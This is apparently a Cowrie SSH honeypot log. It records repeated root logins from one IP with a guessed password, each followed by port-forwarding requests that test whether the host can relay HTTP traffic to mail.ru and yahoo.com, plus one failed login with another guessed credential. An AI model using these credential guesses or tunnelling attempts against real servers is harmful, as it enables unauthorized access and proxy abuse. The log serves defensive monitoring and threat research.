{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.201408Z","src_ip":"77.83.207.83","session":"6aa3f7443bc5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.461715Z","src_ip":"77.83.207.83","session":"6aa3f7443bc5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22605,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22605","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.515593Z","session":"6aa3f7443bc5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.567678Z","src_ip":"77.83.207.83","session":"6aa3f7443bc5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":32340,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:32340","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.714339Z","session":"6aa3f7443bc5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.766387Z","src_ip":"77.83.207.83","session":"6aa3f7443bc5"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"root123","message":"login attempt [hadoop/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.911793Z","src_ip":"212.227.125.160","session":"0dc74177aec4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":18646,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18646","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.914331Z","session":"6aa3f7443bc5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:15.966603Z","src_ip":"77.83.207.83","session":"6aa3f7443bc5"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.019883Z","src_ip":"77.83.207.83","session":"6aa3f7443bc5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33554,"dst_ip":"1.2.3.4","dst_port":22,"session":"df3a7a108b3b","protocol":"ssh","message":"New connection: 77.83.207.83:33554 (1.2.3.4:22) [session: df3a7a108b3b]","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.069166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.078651Z","src_ip":"77.83.207.83","session":"df3a7a108b3b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.119671Z","src_ip":"77.83.207.83","session":"df3a7a108b3b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.371330Z","src_ip":"77.83.207.83","session":"df3a7a108b3b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1668,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1668","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.422604Z","session":"df3a7a108b3b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.473013Z","src_ip":"77.83.207.83","session":"df3a7a108b3b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":5589,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5589","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.616708Z","session":"df3a7a108b3b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.667127Z","src_ip":"77.83.207.83","session":"df3a7a108b3b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":21996,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:21996","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.808862Z","session":"df3a7a108b3b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.859281Z","src_ip":"77.83.207.83","session":"df3a7a108b3b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.910544Z","src_ip":"77.83.207.83","session":"df3a7a108b3b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33657,"dst_ip":"1.2.3.4","dst_port":22,"session":"27a38537e0f1","protocol":"ssh","message":"New connection: 77.83.207.83:33657 (1.2.3.4:22) [session: 27a38537e0f1]","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.959471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:16.960463Z","src_ip":"77.83.207.83","session":"27a38537e0f1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.011039Z","src_ip":"77.83.207.83","session":"27a38537e0f1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.260270Z","src_ip":"77.83.207.83","session":"27a38537e0f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13228,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13228","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.311742Z","session":"27a38537e0f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.362329Z","src_ip":"77.83.207.83","session":"27a38537e0f1"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.376374Z","src_ip":"212.227.125.160","session":"0dc74177aec4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":23600,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:23600","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.504833Z","session":"27a38537e0f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.555112Z","src_ip":"77.83.207.83","session":"27a38537e0f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":10311,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10311","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.696427Z","session":"27a38537e0f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.746978Z","src_ip":"77.83.207.83","session":"27a38537e0f1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.798103Z","src_ip":"77.83.207.83","session":"27a38537e0f1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33739,"dst_ip":"1.2.3.4","dst_port":22,"session":"261ac9ef273e","protocol":"ssh","message":"New connection: 77.83.207.83:33739 (1.2.3.4:22) [session: 261ac9ef273e]","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.847737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.857666Z","src_ip":"77.83.207.83","session":"261ac9ef273e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:17.898962Z","src_ip":"77.83.207.83","session":"261ac9ef273e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.152507Z","src_ip":"77.83.207.83","session":"261ac9ef273e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12460,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12460","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.203972Z","session":"261ac9ef273e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.255217Z","src_ip":"77.83.207.83","session":"261ac9ef273e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":14602,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:14602","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.397266Z","session":"261ac9ef273e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.448060Z","src_ip":"77.83.207.83","session":"261ac9ef273e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":20490,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20490","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.593105Z","session":"261ac9ef273e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.644419Z","src_ip":"77.83.207.83","session":"261ac9ef273e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.697071Z","src_ip":"77.83.207.83","session":"261ac9ef273e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33832,"dst_ip":"1.2.3.4","dst_port":22,"session":"377b74708405","protocol":"ssh","message":"New connection: 77.83.207.83:33832 (1.2.3.4:22) [session: 377b74708405]","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.746603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.747802Z","src_ip":"77.83.207.83","session":"377b74708405"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:18.798184Z","src_ip":"77.83.207.83","session":"377b74708405"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.047890Z","src_ip":"77.83.207.83","session":"377b74708405"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13575,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:13575","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.099355Z","session":"377b74708405"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.149572Z","src_ip":"77.83.207.83","session":"377b74708405"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22548,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22548","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.292583Z","session":"377b74708405"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:19.342815Z","src_ip":"77.83.207.83","session":"377b74708405"}
